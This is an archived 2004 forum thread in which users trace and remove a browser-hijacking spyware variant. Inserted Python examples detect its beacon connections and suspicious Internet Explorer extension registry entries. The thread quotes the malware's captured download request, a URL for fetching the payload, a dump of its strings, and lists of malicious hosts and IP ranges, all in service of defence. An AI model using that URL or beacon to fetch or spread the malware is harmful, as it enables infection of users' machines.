Had this? "mk:@MSITStore:C:\WINDOWS\start.chm::/start.html"
DB123
April 25th, 2004, 12:04 PM
Hey all,
Something isn't right here. I've been hit with that mkstore problem that auto-executes rubbish on your system. Except this one just won't go away.
You know the problem I'm talking about, so let me get right to it. First, I think creating a write protected 0 byte start.chm file prevents the thing from "infecting" your machine, but not running access[1].exe - killing the access[1].exe task prevents it from coming back. Second, I've seen a new variant of this which runs a cmd.exe that takes 100% cpu - killing that solves the problem.
In brief. I've run ad-aware, spybot and hijack this. I know what I'm doing and the hijack this output shows nothing unusual. I tried to procdump the exe and disassemble it, but all I got was a load of garbage. I haven't tried softice on it yet.
Does anyone know exactly how to confirm whether this thing is still on my machines, or whether it's just coming back when I'm browsing sites? If I know it's not there then I can at least start from a "known good" point when hacking it apart.
An observation... It seems to return shortly after I go to EBay, which is somewhat interesting. Also if you boot up, use the system normally but don't run IE, the spyware doesn't start which leads me to believe it's either some cleverly hidden browser hook (which I really doubt), it's a hidden task that waits for iexplore.exe to load (which is possible, if the footprint is small enough the process won't show up), or it's coming back when browsing to a website.
Any help on confirming it's not on my system is appreciated. Then I'll attack this little POS with my trusty copy of wdasm... Rule #1 for whatever idiot wrote this, never annoy a coder.
dvk01
April 25th, 2004, 12:07 PM
http://www.wilderssecurity.com/showthread.php?t=28658
look at post number 9
DB123
April 25th, 2004, 12:12 PM
If you mean the one posted at April 22nd, 2004, 04:47 AM by Unzy, titled
"Re: CWS Variants
start.chm / MSITStore (MasterSearch)
A new type of CWS variant that uses an exploit to reset a user's homepage."
That doesn't help much :). I don't have those browser pages set, and the thing keeps coming back.
I'm just not convinced that by removing the chm, the .exe process and the pages it removes the spyware. It's coming back somehow, and unless Ebay or Yahoo are using it then it's got to be from the local machine.
dvk01
April 25th, 2004, 12:19 PM
look at my edit saying about emptying temp files
several hijackers are using the exploit now, not just master search
DB123
April 25th, 2004, 12:45 PM
Nothing there except an interesting batch file that doesn't do anything...
Grumble
April 25th, 2004, 02:02 PM
Hey guest, I noticed that even with cwshredder & hjthis clean & no start.chm file present, the thing seems to do this: when any app initially connects to the internet, or any type of help file is accessed, shortly afterward an additional TCP connect is made under that process to an IP in Russia, which then closes quickly, you can't see it with netstat, I used Port Explorer to watch it and identify the IP (which is the same each time).
I'm beginning to think it may be able to eventually download the new start.chm & registry crap after repeating this with virtually every process that connects to the net.
Anyway, since I blocked the IP range 81.211.105.* from leaving my router & banned the IP range from incoming at my computer firewall, none of the start.chm or registry crap has reappeared (5 days now). The critter still tries to call home with each process that accesses the net, but it can't get out anymore. If you use a tool like Port Explorer you should be able to see it on your machine. Hope this helps.
DB123
April 25th, 2004, 02:56 PM
Interesting, thanks for adding that.
Next time it happens, can you try using FPORT on it? FPort maps network connections to processes & files, you can get it from Foundstone (http://www.foundstone.com/knowledge/proddesc/fport.html). That will tell you what is making the outgoing connection...
tbyrnes
April 25th, 2004, 04:13 PM
I think you guys might be on to something here. I've had the same inability to completely remove this virus. I get everything cleaned up, and as soon as I reboot, Spyware Guard tells me something is trying to change my home page again. After reading this post, it hit me that this occurs right after my startup process starts something called NIS Time, which is a software tool to check/set the system time. This is the first time anything on my pc tries to go out over the net.
I downloaded Fport and tried running it. I get the following results:
FPort v2.0 - TCP/IP Process to Port Mapper
Copyright 2000 by Foundstone, Inc.
http://www.foundstone.com
Pid Process Port Proto Path
284 svchost -> 135 TCP C:\WINDOWS\system32\svchost.exe
4 System -> 139 TCP
4 System -> 445 TCP
992 svchost -> 1025 TCP C:\WINDOWS\System32\svchost.exe
4 System -> 1026 TCP
1660 Explorer -> 1355 TCP C:\WINDOWS\Explorer.EXE
1624 -> 5000 TCP
3084 aim -> 5180 TCP C:\Program Files\AIM95\aim.exe
0 System -> 123 UDP
0 System -> 137 UDP
0 System -> 138 UDP
284 svchost -> 445 UDP C:\WINDOWS\system32\svchost.exe
4 System -> 1027 UDP
1660 Explorer -> 1032 UDP C:\WINDOWS\Explorer.EXE
1624 -> 1100 UDP
992 svchost -> 1148 UDP C:\WINDOWS\System32\svchost.exe
0 System -> 1900 UDP
3084 aim -> 1900 UDP C:\Program Files\AIM95\aim.exe
What I'm not clear on is how I could use this tool to see what is trying to get to the Russian ip address. FPort seems to take a snapshot of port ownership. If something is grabbing a port to reach out to the Russian ip, then almost immediately releases that port, how would this catch it? I'm wondering if I should download and try ZoneAlarm. If I recall, you can set that so anything that tries to access the net will get flagged and held up pending permission.
Tim
tbyrnes
April 25th, 2004, 04:56 PM
Ok, I installed Zone Alarm and set it to require permissions before anything goes out over the internet. I disabled my NISTIME because of timing problems - it seemed to want to do its thing before ZoneAlarm was fully initialized. The following files requested access to the internet as part of start up processes:
svchost.exe
explorer.exe
msbntray.exe
The Spyware Guard message about my home page being changed popped up after I granted access for explorer.exe to use the net. I wonder if the virus is somehow attaching to that file?
Tim
dvk01
April 25th, 2004, 05:03 PM
explorer shouldn't need to access the net, you should block that with ZA
the svchosts entries will need to access and msbntray will
we know that a lot of the cws baddies attach to explorer, that is why we had you run the pv looking for the dll that had attached itself
and nothing was showing in your logs
tbyrnes
April 25th, 2004, 05:16 PM
Derek, which PV option was that? I think I was asked to use option 1 and option 7 at different points. Whichever is the right one, I'd like to try again if you don't mind since explorer.exe seems to want to talk to the internet.
Thanks. Want me to post the results back over in my own thread?
Tim
dvk01
April 25th, 2004, 05:18 PM
either option 1 or 2 are the explorer & Internet Explorer dlls
but if they didn't show last time, they aren't likely to show this time
Grumble
April 25th, 2004, 05:48 PM
{QUOTE-> ...Next time it happens, can you try using FPORT on it? That will tell you what is making the outgoing connection... <-QUOTE}
I don't think you will see it with FPort. PE shows real time events as they happen, and logs the events, second by second.
The TCP connect happens, then exactly 21 seconds later it closes. The same process that made the net connection (for example, iexplore.exe) same PID, is the process that does the connect to the Russian IP but on another local port (looks like the next available port), and with 0.0.0.0 local address rather than 192.168.x.x
If I have the Ruskie IP blocked from outgoing to the WAN at the router, the Ruskie port closes 21 seconds after it opens and that's all. If the Ruskie IP is not blocked from outgoing to the WAN, the Ruskie port closes 21 seconds after it opens, AND THEN for a few minutes the remote Ruskie IP port 80 will try some incoming connects to my computer (2 times on three different ports, then quit). The incoming attempts are blocked at my firewall and logged there since I've got the IP entered as an incoming banned IP.
It's not only iexplore.exe connecting to the net that gets the Ruskie IP in action, but also other stuff like mcafee security center processes that connect to the net.
I'm getting kinda blurry-eyed from looking at these logs & stuff now, but maybe I ought to run some kind of dll checks sometime and have the guys here check 'em out.
ArcdEvilz
April 25th, 2004, 09:24 PM
Microsoft has released an update to help solve this problem.
More info can be found here: http://www.microsoft.com/technet/security/bulletin/MS04-004.mspx :-X
Rakewell
April 26th, 2004, 12:02 AM
The same thing is happening to me. Since I created the readonly start.chm and start.html files, my browser isn't being hijacked anymore. But I'm still getting the access[1].exe files and the high-CPU cmd.exe's.
I installed Port Explorer, and am seeing the same behaviour DB123 described -- namely, normal connections are followed by a connection to 81.211.105.70.
With Port Explorer, I was able to see what was in those connections:
GET /report/reportsync.php?cid=64446bc9-e268-4a54-8597-ec057ab4dcfc HTTP/1.1
Accept: */*
XXXXXXXXXXXXXXX: XXXXXXXXXXXXX
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: main.tibssystems.com
Connection: Keep-Alive
This downloads access.exe, which gets stored in the cache and executed as access[1].exe.
You can get the access.exe file by going directly to http://81.211.105.70/report/reportsync.php. Obviously, just save it. Can someone disassemble it and tell us what it's latching itself onto so that we can get rid of it once and for all?
Pieter_Arntz
April 26th, 2004, 03:23 AM
Can anyone get me a sample of the access[1].exe ?
I think it holds the solution to this mystery.
(Got plenty, thanks to all that submitted)
Preferably zipped up, so it doesn't get intercepted by any AV-scanners.
Regards,
Pieter
dempapa
April 26th, 2004, 08:29 AM
I too have this hacker on my PC and have been frustrated because it's unknown how to remove all components and all suggested solutions are about hiding the symptoms rather than curing the disease.
I don't want to take over this posting, just wanted to say that this is the most convincing posting I've seen in terms of finding a solution and wish you guys well.
DB123
April 26th, 2004, 11:28 AM
Okay, I'm at work at the minute but wanted to add this.
If anyone can send me the flat access[1].exe file, I can disassemble it. Alternatively we need to find out how it gets launched. The reason for this is as follows.
The aim is to get the exe in a "virgin" state on disk to disassemble. Simply ripping it out of memory with procdump won't do this as the exe will by definition change its internal states as it executes.
What we need to do is to find the launch point. When we know that, we can set a bpx (breakpoint in execution) in Softice, and find the first line of code of the exe. We then change that to a jmp esi, which puts it in an infinite loop. Then we can use procdump to get a virgin copy that can be disassembled. It's the same technique used to reverse engineer upx'd & compressed exe's.
The post above about the php file is very promising. What's annoying is I patched hh.exe (the CHM file reader for Windows) to prompt whenever a CHM file was executed - it didn't warn me, but access[1].exe came back. So the comment I read elsewhere about preventing chm files from being launchable doesn't seem to hold true.
Are there any other coders/reverse engineers/crackers here that can work with me on this?
Gurth
April 26th, 2004, 12:53 PM
I found 5 ACCESS[1].EXE-*.pf files in my c:\windows\prefetch dir that might help...
{QUOTE-> Okay, I'm at work at the minute but wanted to add this.
If anyone can send me the flat access[1].exe file, I can disassemble it. Alternatively we need to find out how it gets launched. The reason for this is as follows.
<snip>
dvk01
April 26th, 2004, 01:08 PM
this cws hijacker comes back normally and we are still working on ways to kill it off permanently
what works for some doesn't work for others, but some get rid of it fairly easily
a workaround seems to be install a good firewall, lists here http://www.wilders.org/firewalls.htm and block these ranges of ports, both incoming and outgoing 209.66.114.0-209.66.115.255 and 81.211.105.0-81.211.105.255
that stops the known cws servers responding or the hidden files on your computer updating. This works sometimes but not always, but it's a help. The problem with this approach is that some good sites might also be blocked
then
kill it off using shredder etc and hjt as advised while disconnected from the net
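Grumble's Port Explorer observation (a second connection under a legitimate process's PID that closes 21 seconds later), tbyrnes' point that FPort only snapshots port ownership, the request Rakewell captured to main.tibssystems.com and the ranges dvk01 suggests blocking all describe the same thing: a short-lived beacon that a snapshot tool misses but a timed connection log catches. The following Python is an added example written for this thread, not code from the thread or from Port Explorer, FPort or ZoneAlarm. The connection-log layout (time, pid, process, local, remote, open/close) is an invented format standing in for whatever your monitoring tool exports, the log lines are constructed, and the non-beacon addresses use the 203.0.113.0/24 documentation range. The beacon host, path and IP ranges are the ones quoted in the thread.

```python
import ipaddress
import re
from datetime import datetime

# Ranges dvk01 recommends blocking. 209.66.114.0/23 is exactly
# 209.66.114.0-209.66.115.255 and 81.211.105.0/24 is 81.211.105.0-81.211.105.255.
BLOCKED_RANGES = [ipaddress.ip_network("209.66.114.0/23"),
                  ipaddress.ip_network("81.211.105.0/24")]

# Hosts and request path seen in Rakewell's and Fireflyer's captures.
BEACON_HOSTS = {"main.tibssystems.com", "main-news-com.com"}
BEACON_PATH = re.compile(r"^/report/report(?:sync|stats)\.php\?cid=", re.IGNORECASE)

# Constructed connection log in an invented "time pid process local remote event"
# layout. The 81.211.105.70 connection mimics the 21-second beacon from the thread.
SAMPLE_CONNECTION_LOG = """\
12:00:00 1660 iexplore.exe 192.168.1.10:1355 203.0.113.5:80 open
12:00:01 1660 iexplore.exe 0.0.0.0:1356 81.211.105.70:80 open
12:00:03 1624 updater.exe 192.168.1.10:1357 203.0.113.9:443 open
12:00:22 1660 iexplore.exe 0.0.0.0:1356 81.211.105.70:80 close
12:00:40 1624 updater.exe 192.168.1.10:1357 203.0.113.9:443 close
12:05:00 1660 iexplore.exe 192.168.1.10:1355 203.0.113.5:80 close
"""

# The request Rakewell posted (the masked header line is omitted).
SAMPLE_REQUEST = (
    "GET /report/reportsync.php?cid=64446bc9-e268-4a54-8597-ec057ab4dcfc HTTP/1.1\r\n"
    "Accept: */*\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n"
    "Host: main.tibssystems.com\r\n"
    "Connection: Keep-Alive\r\n"
    "\r\n"
)


def ip_in_blocked_range(ip):
    """True if the address falls inside one of the ranges from the thread."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in BLOCKED_RANGES)


def parse_connection_log(text):
    """Turn the constructed log lines into event dicts."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, pid, proc, local, remote, event = line.split()
        remote_ip, remote_port = remote.rsplit(":", 1)
        events.append({"time": datetime.strptime(ts, "%H:%M:%S"), "pid": int(pid),
                       "process": proc, "local": local, "remote_ip": remote_ip,
                       "remote_port": int(remote_port), "event": event})
    return events


def find_beacons(events, max_seconds=60):
    """Pair open/close events and report short-lived connections into blocked ranges.

    A snapshot tool (FPort) cannot do this; it needs the open and the close time.
    """
    open_conns, findings = {}, []
    for ev in events:
        key = (ev["pid"], ev["local"], ev["remote_ip"], ev["remote_port"])
        if ev["event"] == "open":
            open_conns[key] = ev["time"]
        elif ev["event"] == "close" and key in open_conns:
            lifetime = (ev["time"] - open_conns.pop(key)).total_seconds()
            if ip_in_blocked_range(ev["remote_ip"]) and lifetime <= max_seconds:
                findings.append({"pid": ev["pid"], "process": ev["process"],
                                 "remote": f"{ev['remote_ip']}:{ev['remote_port']}",
                                 "seconds": lifetime})
    return findings


def parse_http_request(raw):
    """Parse the request line and headers of a captured HTTP request."""
    lines = raw.splitlines()
    method, path, version = lines[0].split()
    headers = {}
    for line in lines[1:]:
        if not line.strip():
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "version": version,
            "host": headers.get("host", "")}


def is_beacon_request(req):
    """Match on the host or on the /report/report*.php?cid= path from the captures."""
    return req["host"].lower() in BEACON_HOSTS or bool(BEACON_PATH.match(req["path"]))


if __name__ == "__main__":
    for hit in find_beacons(parse_connection_log(SAMPLE_CONNECTION_LOG)):
        print("beacon:", hit)
    print("request is beacon:", is_beacon_request(parse_http_request(SAMPLE_REQUEST)))
```

The pairing key includes the PID and the local port, which is why the second iexplore.exe connection is separated from the legitimate one: the same process, a new local port (0.0.0.0:1356 in the constructed data, matching Grumble's "next available port" with a 0.0.0.0 local address), and a 21-second lifetime into 81.211.105.0/24. The HTTP check is deliberately loose on the host so that a renamed server still trips the path match.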
DB123
April 26th, 2004, 01:58 PM
Gurth, thanks for the offer but the -pf is junk. Rakewell got it in 1, download that with a dl manager (getright, flashget), rename it to an exe and it's a valid PE file.
Here's a start, don't have much time right now but I'll set up a sandbox and start hitting this POS. It was coded with Visual C++ (VC6 I believe). Here's some interesting strings in the table (just look at the end of the line, the start is the offset and the type). The worrying one is "wininet.dll", it might be patching it. My wininets are all the right size & date, so perhaps Windows FileProt fixed it for me...
24672,Char,11,tibsystems.
24684,Char,13,statsbank.com
24700,Char,15,boards.cexx.org
24716,Char,22,adultwebmasterinfo.com
24740,Char,12,spywareinfo.
24756,Char,15,dialerschutz.de
24772,Char,18,webmasterworld.com
24804,Char,18,go****yourself.com
24824,Char,17,FindCloseUrlCache
24844,Char,22,FindNextUrlCacheEntryA
24868,Char,23,FindFirstUrlCacheEntryA
24892,DLL,11,wininet.dll
24970,Char,22,if exist %1 goto start
25012,Char,41,SOFTWARE\Microsoft\Internet Explorer\Main
25056,Char,10,Start Page
25068,Char,13,::/start.html
25084,Char,14,mk:@MSITStore:
25100,Char,10,\start.chm
37287,Char,11,/$FIftiMain
37318,Char,15,/arrow_left.gif
37340,Char,16,/arrow_right.gif
37363,Char,13,/ham01000.jpg
37383,Char,13,/ham01001.jpg
37403,Char,13,/ham01100.jpg
37423,Char,13,/ham01200.jpg
37443,Char,13,/ham01300.jpg
37463,Char,13,/ham01400.jpg
37483,Char,13,/ham01500.jpg
37503,Char,13,/ham01600.jpg
37523,Char,13,/ham01700.jpg
37543,Char,13,/ham01800.jpg
37563,Char,13,/ham01900.jpg
37583,Char,13,/ham02000.jpg
37603,Char,13,/ham02001.jpg
37623,Char,13,/ham02100.jpg
37643,Char,13,/ham02200.jpg
37663,Char,13,/ham03000.jpg
37683,Char,13,/ham04000.jpg
37703,Char,13,/ham05000.jpg
37723,Char,13,/ham06000.jpg
37743,Char,13,/ham07000.jpg
37763,Char,13,/ham08000.jpg
37783,Char,13,/ham09000.jpg
37818,Char,13,/mo000000.jpg
37853,Char,12,/poker_t.gif
37872,Char,11,/start.html
37889,Char,13,/sto00000.gif
37909,Char,13,/to000000.jpg
37929,Char,20,::DataSpace/NameList
37951,Char,42,<(::DataSpace/Storage/MSCompressed/Content
37998,Char,46,P,::DataSpace/Storage/MSCompressed/ControlData
38047,Char,42,)::DataSpace/Storage/MSCompressed/SpanInfo
38092,Char,48,/::DataSpace/Storage/MSCompressed/Transform/List
38141,Char,98,<&_::DataSpace/Storage/MSCompressed/Transform/{7FC28940-9D31-11D0-9B27-00A0C91E9C7C}/InstanceData/
38242,Char,106,i::DataSpace/Storage/MSCompressed/Transform/{7FC28940-9D31-11D0-9B27-00A0C91E9C7C}/InstanceData/ResetTable
41266,Unichar,12,Uncompressed
41294,Unichar,12,MSCompressed
41320,Unichar,19,{7FC28940-9D31-11D0
41474,Char,21,HHA Version 4.74.8702
41540,Char,10,start.html
70070,Char,10,vs3+:D)&Op
83737,Char,11,S7K$Lj9SVlX
Here are the interesting imports:
22006,Function,11,FreeLibrary
22020,Function,14,GetProcAddress
22038,Function,12,LoadLibraryA
22066,Function,14,FindFirstFileA
22096,Function,12,GetTickCount
22124,Function,12,GetTempPathA
22140,Function,23,GetEnvironmentVariableA
22166,Function,18,GetModuleFileNameA
22200,Function,11,CloseHandle
22226,Function,11,CreateFileA
22240,Function,12,LockResource
22256,Function,12,LoadResource
22272,Function,13,FindResourceA
22296,Function,14,SizeofResource
22326,Function,14,GetProcessHeap
22354,DLL,12,KERNEL32.dll
22370,Function,21,GetKeyboardLayoutList
22392,DLL,10,USER32.dll
22406,Function,11,RegCloseKey
22420,Function,14,RegSetValueExA
22438,Function,13,RegOpenKeyExA
22452,DLL,12,ADVAPI32.dll
22468,Function,13,ShellExecuteA
22482,DLL,11,SHELL32.dll
22496,Function,16,GetModuleHandleA
22516,Function,15,GetStartupInfoA
22534,Function,15,GetCommandLineA
22552,Function,10,GetVersion
22566,Function,11,ExitProcess
22580,Function,16,TerminateProcess
22600,Function,17,GetCurrentProcess
22620,Function,24,UnhandledExceptionFilter
22648,Function,23,FreeEnvironmentStringsA
22674,Function,23,FreeEnvironmentStringsW
22700,Function,19,WideCharToMultiByte
22722,Function,21,GetEnvironmentStrings
22746,Function,22,GetEnvironmentStringsW
22772,Function,14,SetHandleCount
22790,Function,12,GetStdHandle
22806,Function,11,GetFileType
22820,Function,13,GetVersionExA
22836,Function,11,HeapDestroy
22850,Function,10,HeapCreate
22864,Function,11,VirtualFree
22890,Function,12,VirtualAlloc
22906,Function,11,HeapReAlloc
22954,Function,19,MultiByteToWideChar
22976,Function,12,LCMapStringA
22992,Function,12,LCMapStringW
23008,Function,14,GetStringTypeA
23026,Function,14,GetStringTypeW
DB123
April 26th, 2004, 04:14 PM
Okay, I'm convinced we're missing something. The only sites I've been to have been known-good ones. So unless this site, Ebay, yahoo or NukeCops are causing this spyware to be downloaded, it's still on my machine.
Anyone got any ideas? There's no point disasm'ing this thing if I can't get it cleaned...
DB123
April 26th, 2004, 04:37 PM
Another possibility. I think EBay may be involved. I tracked down the copy of Access[1].exe to the exact time I was logged into my ebay UK account. In Ebay UK "My Account", there is a banner advert top-center of the page - I'm wondering if one of the adverts they show is causing this hijack.
Incidentally you won't be able to find the exe in the IE cache/history, you'll have to reboot and delete everything in your profile/local settings/temporary internet files from a cmd prompt or non-Explorer tool (such as DOpus).
Can anyone with an EBay UK account keep an eye out and see if they see anything similar?
dempapa
April 26th, 2004, 04:58 PM
It's nothing specific to eBay.
The hacker waits until you connect to the internet then downloads it stuff. If you make a connection using say Outlook hooked up to your hotmail account you'll experience the same problem.
Read around and look at the many other postings on this virus and you'll see what people are discovering about this new pest.
Rakewell
April 26th, 2004, 05:16 PM
It could be anything. Maybe a banner that eBay is displaying, or maybe something in a person's ad. I don't know.
What concerns me more is the possibility that the infection (the part that makes IE go pull down that php file) comes from a different source, and access[1].exe doesn't actually infect machines. In which case, reverse engineering access[1].exe won't tell us how to make IE stop pulling it down.
Maybe all access[1].exe does is pop up the $3.5 million lottery window via cmd.exe? (I've always killed cmd.exe to get rid of that popup, so I don't know what happens when you click either button.)
Actually, what you posted doesn't include the string about $3.5M, but it was in another post here where someone posted their results of disassembling access.exe. I wonder if there are multiple versions or if it mutates? What's the md5 hash on the version you've got? (I'm not sure how to get the hash in plain Windows. I've got cygwin and it includes md5sum.)
The hash on the version I have is: f56b2442dcd2f553b2fdd060c00bf99e
Rakewell
April 26th, 2004, 05:45 PM
Thanks dempapa!
That link had very useful info. I've got a c_10230.dll file in windows\system32. It has the same modification date/time as most of the standard windows files, but it contains the string "tibsdown.dll". And since we know that tibssystems is somehow connected to this hack, I don't take this to be a good sign. (Also among the strings at the end are "urlmon.dll", "CoCreateGuid", "UuidToString", "URLDownloadToCacheFile", and "DllRegisterServer." I know virtually nothing about Windows internals, but this sounds like the kind of things this hack is doing.)
I've also got the registry key HKCR\CLSID\{869ee607-5376-486d-8dac-edc8e239ad5f} and it has one subkey: InprocServer32 with value c:\windows\system32\c_10230.dll.
That CLSID is referenced in HKLM\Software\Microsoft\Internet Explorer\Extensions\{869<etc>}. I'm guessing I need to delete this key as well, and check the other five extensions to make sure they're legit.
I recognize four of the extensions. But this 869 one and {9DBB80E2-B571-4756-8A5F-AD3994C9B4F3} have nothing but a CLSID so the 9DBB<etc> one makes me nervous too.
And rightly so. HKCR\CLSID\{9DBB<etc>} runs access[1].exe from my temporary internet files.
I'm going to look at these items on my uninfected machines and see what the difference is, then try making this machine look the same. I think it will just be a matter of deleting those four registry keys. What I have to check is whether c_10230.dll is supposed to exist or not.
Will post my results once I've tried this.
Fireflyer
April 26th, 2004, 06:52 PM
Rakewell,
As per my post at:
http://www.spywareinfo.com/forums/index.php?act=ST&f=30&t=42784&hl=&view=findpost&p=215180
Looking at Proxomitron header logs, I discovered that the trojan was attempting to contact main.tibssystems.com. When it failed it tried main-news-com.com.
When it succeeded, it downloaded a file - access.exe - 3072 bytes in length which then executed from the Temporary Internet Files\Content.IE5 cache.
I tracked down the culprit as crt32_v2.dll - a 19,968 byte file - renaming it stopped all attempts to contact the websites and stopped the downloading of access.exe.
HKEY_CLASSES_ROOT\CLSID\{869EE607-5376-486d-8DAC-EDC8E239AD5F}\InprocServer32
Pointed to C:\WINDOWS\SYSTEM\CRT32_V2.DLL
This would seem to be the same as your C_10230.DLL.
In all I have 7 Registry entries containing {869EE607-etc.} and 2 of them refer to crt32_v2.dll.
Cripple that file by renaming it and the exploit stops running.
Rakewell
April 26th, 2004, 08:25 PM
Thanks, Fireflyer.
It's good to know that once I delete these registry entries, I should be OK. I've applied the MS patch
FYI, the access.exe that I got was 88K (90112 bytes). There must be lots of variants going around. As it is, the one I had doesn't seem too bad. Something running as access[1].exe has pretty obviously come from the internet. Some of the other ones I've read about that disguise themselves as real applications ("Internet Optimizer", "TV Media") must be harder to recognize as the source of the problem.
Anyway, I hope that internet security products are going to start looking at the IE extensions. Warning us when something tries to add an extension, blocking the CLSID's that are known to be evil (for the real-time scanners), and showing us all our extensions so we can make sure we recognize them all (for the after-the-fact scanners like HJT and Spybot).
I'm glad that's over. This is the first time I've had one of these things since ILOVEYOU back a few years ago.
Thanks everyone for your help!
dempapa
April 26th, 2004, 09:15 PM
Check this out:
http://www.freedomlist.com/forum/viewtopic.php?t=16135
Grumble
April 26th, 2004, 09:41 PM
Speaking of registry entries, here are 6 of interest and their contents from my XP (he) machine:
------------------------
HKEY_CLASSES_ROOT\CLSID\{869EE607-5376-486d-8DAC-EDC8E239AD5F}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{869EE607-5376-486d-8DAC-EDC8E239AD5F}\InprocServer32
C:WINDOWS\System32\c_10230.dll
-------------------------
-------------------------
HKEY_CURRENT_USER\Software\Microsoft\Search Assistant\ACMru\5603
HKEY_USERS\S-1-5-21-2555084713-1658777684-3585553489-1007\Software\Microsoft\Search Assistant\ACMru\5603
c_10230.ddl
crt32_v2.dll
imapi.exe
helpctr.exe
hh.exe
tibsystems
hkdp
-------------------------
-------------------------
HKEY_CURRENT_USER\Software\Microsoft\Search Assistant\ACMru\5604
HKEY_USERS\S-1-5-21-2555084713-1658777684-3585553489-1007\Software\Microsoft\Search Assistant\ACMru\5604
tibsystems
-------------------------
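Rakewell's and Fireflyer's posts describe the same audit by hand: walk HKLM\Software\Microsoft\Internet Explorer\Extensions, take each entry's CLSID, look it up under HKCR\CLSID to find the InprocServer32 or LocalServer32 file, and be suspicious of entries that carry nothing but a CLSID or whose server lives in System32 under an odd name or in the Temporary Internet Files cache. The following Python is an added example that performs that audit offline over a .reg export (exported with regedit, so it runs on any platform); it is not a tool from the thread and not HijackThis. SAMPLE_REG is a constructed export: the two CLSIDs and the two DLL names are the ones quoted in the thread, while the {AAAAAAAA-...} extension, every file path and the user profile are placeholders.

```python
# Constructed .reg export (regedit's double-backslash escaping). Only the CLSIDs
# and the c_10230.dll / crt32_v2.dll names come from the thread; the rest is made up.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Extensions\{869EE607-5376-486d-8DAC-EDC8E239AD5F}]
"CLSID"="{869EE607-5376-486d-8DAC-EDC8E239AD5F}"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Extensions\{9DBB80E2-B571-4756-8A5F-AD3994C9B4F3}]
"CLSID"="{9DBB80E2-B571-4756-8A5F-AD3994C9B4F3}"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Extensions\{AAAAAAAA-0000-0000-0000-000000000001}]
"CLSID"="{AAAAAAAA-0000-0000-0000-000000000001}"
"ButtonText"="Example Button"
"MenuText"="Example Button"

[HKEY_CLASSES_ROOT\CLSID\{869EE607-5376-486d-8DAC-EDC8E239AD5F}\InprocServer32]
@="C:\\WINDOWS\\System32\\c_10230.dll"

[HKEY_CLASSES_ROOT\CLSID\{9DBB80E2-B571-4756-8A5F-AD3994C9B4F3}\LocalServer32]
@="C:\\Documents and Settings\\user\\Local Settings\\Temporary Internet Files\\Content.IE5\\PLACEHOLDER\\access[1].exe"

[HKEY_CLASSES_ROOT\CLSID\{AAAAAAAA-0000-0000-0000-000000000001}\InprocServer32]
@="C:\\Program Files\\Example\\exbutton.dll"
"ThreadingModel"="Apartment"
"""

EXT_PREFIX = "HKEY_LOCAL_MACHINE\\SOFTWARE\\MICROSOFT\\INTERNET EXPLORER\\EXTENSIONS\\"
# Indicators quoted in this thread.
KNOWN_BAD_CLSIDS = {"{869EE607-5376-486D-8DAC-EDC8E239AD5F}",
                    "{9DBB80E2-B571-4756-8A5F-AD3994C9B4F3}"}
KNOWN_BAD_FILES = {"c_10230.dll", "crt32_v2.dll"}
# A COM server registered out of the browser cache or a temp directory is
# never legitimate; this heuristic is the example's own.
CACHE_MARKERS = ("temporary internet files", "content.ie5", "\\temp\\")


def parse_reg(text):
    """Parse a regedit export into {UPPERCASE_KEY_PATH: {"path": ..., "values": {...}}}."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].upper()
            keys[current] = {"path": line[1:-1], "values": {}}
            continue
        if current is None or "=" not in line:
            continue
        name, _, value = line.partition("=")
        name = name.strip().strip('"').lower()        # "@" is the default value
        value = value.strip()
        if value.startswith('"') and value.endswith('"'):
            value = value[1:-1].replace("\\\\", "\\").replace('\\"', '"')
        keys[current]["values"][name] = value
    return keys


def server_path(keys, clsid):
    """Find the InprocServer32/LocalServer32 default value for a CLSID, if exported."""
    for root in ("HKEY_CLASSES_ROOT", "HKEY_LOCAL_MACHINE\\SOFTWARE\\CLASSES"):
        for sub in ("INPROCSERVER32", "LOCALSERVER32"):
            key = keys.get(f"{root}\\CLSID\\{clsid.upper()}\\{sub}")
            if key and "@" in key["values"]:
                return key["values"]["@"]
    return ""


def audit_extensions(keys):
    """Report IE Extensions entries that match the thread's indicators or look wrong."""
    findings = []
    for upper, key in keys.items():
        # Only the direct children of ...\Extensions, not deeper subkeys.
        if not upper.startswith(EXT_PREFIX) or upper.count("\\") != EXT_PREFIX.count("\\"):
            continue
        values = key["values"]
        clsid = values.get("clsid", upper.rsplit("\\", 1)[1])
        path = server_path(keys, clsid)
        reasons = []
        if clsid.upper() in KNOWN_BAD_CLSIDS:
            reasons.append("CLSID named in this thread")
        if "buttontext" not in values and "menutext" not in values:
            reasons.append("no ButtonText/MenuText, only a CLSID")
        filename = path.rsplit("\\", 1)[-1].lower()
        if filename in KNOWN_BAD_FILES:
            reasons.append(f"server file {filename} named in this thread")
        if any(marker in path.lower() for marker in CACHE_MARKERS):
            reasons.append("server path is inside a browser cache or temp directory")
        if reasons:
            findings.append({"clsid": clsid, "server": path, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in audit_extensions(parse_reg(SAMPLE_REG)):
        print(finding["clsid"], finding["server"])
        for reason in finding["reasons"]:
            print("   -", reason)
```

Key paths are compared case-insensitively because regedit preserves whatever casing the registering code used (note the lowercase "486d" in the quoted CLSID). The "only a CLSID" heuristic is the one Rakewell applied by eye: a real toolbar button or Tools-menu extension carries ButtonText or MenuText, so an Extensions entry with nothing but a CLSID deserves a look even when the CLSID is not yet on any list.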
A friend
April 27th, 2004, 02:24 PM
Hi,
Running Win98-SE
Been following the gameplay and having an amateurish stab ... Sent some data to Pieter .... Have deleted my C_10230.dll file and the several registry 'extension' keys .... Deleted the old 'start.chm' file ... reapplied the latest MS updates from old Bill Insecure-Gates and have been running for a fair time with no recurrence ....
